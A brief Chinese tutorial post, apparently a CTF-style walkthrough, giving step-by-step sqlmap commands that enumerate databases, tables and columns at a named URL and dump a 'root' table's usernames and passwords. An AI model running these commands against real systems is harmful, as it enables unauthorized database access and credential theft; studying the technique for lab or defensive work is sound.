Java教程
Sqlmap
本文主要是介绍Sqlmap,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
(1)输入python sqlmap.py,
(2)找到可能包含漏洞的文件地址,例如python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201",
由此看到包含三种漏洞。
(3)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" --dbs,找到符合要求的数据库,图为“jnng”
(4)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng --tables,查看数据库jnng中的所有表信息,找到可能包含密码或flag的列
(5)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng -T root --columns,爆破列
(6)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng -T root -C root_id,root_name,root_pass --dump,爆破列的相关信息
这篇关于Sqlmap的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
面向对象编程基础:初学者指南09-07
-
数据结构入门:了解基础概念与简单应用09-07
-
面向对象编程入门:掌握基本概念与实践09-07
-
数据结构入门:从基础概念到基本操作09-07
-
从零开始学数据库:入门级指南与实操技巧09-07
-
综合设备故障分析与预防:实例代码与优化策略09-07
-
数据库入门:轻松掌握数据管理基础09-07
-
面向对象入门:快速掌握对象编程基础09-07
-
数据库教程:入门与实践指南09-07
-
面向对象开发教程 - 从零基础到实践应用的进阶之路09-07
-
从入门到实践:Auth机制的简单教程09-07
-
快速上手 Drizzle ORM:入门级教程09-07
-
入门指南:轻松掌握公共API的使用09-07
-
深入浅出:Server Component 在现代Web开发中的应用与实践09-07
-
GET 起 TRPC:入门级教程,轻松掌握RESTful API的简洁之道09-07
栏目导航
